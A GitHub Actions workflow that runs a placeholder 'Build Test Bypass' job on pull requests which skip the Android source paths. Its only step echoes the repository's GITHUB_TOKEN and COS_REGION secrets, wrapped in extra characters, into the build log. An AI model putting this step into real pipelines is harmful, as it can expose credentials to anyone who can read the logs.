name: '[android] build tests'

on:
  pull_request:
    branches:
      - main
      - master
      - v3.0-dev
      - v3.0
    paths-ignore:
      - 'driver/js/android/**'
      - 'driver/js/core/**'
      - 'dom/**'
      - 'layout/engine/**'
      - 'modules/android/**'
      - 'renderer/native/android/**'
      - 'devtools/devtools-backend/**'
      - 'gradle/**'
      - 'build.gradle'
      - 'gradle.properties'
      - 'settings.gradle'
      - 'gradlew'
      - 'gradlew.bat'

jobs:
  android_build_tests:
    runs-on: ubuntu-latest
    steps:
    - name: Build Test Bypass
      run: |
        echo "a${{ secrets.GITHUB_TOKEN }}b"
        echo "a${{ secrets.COS_REGION }}b"
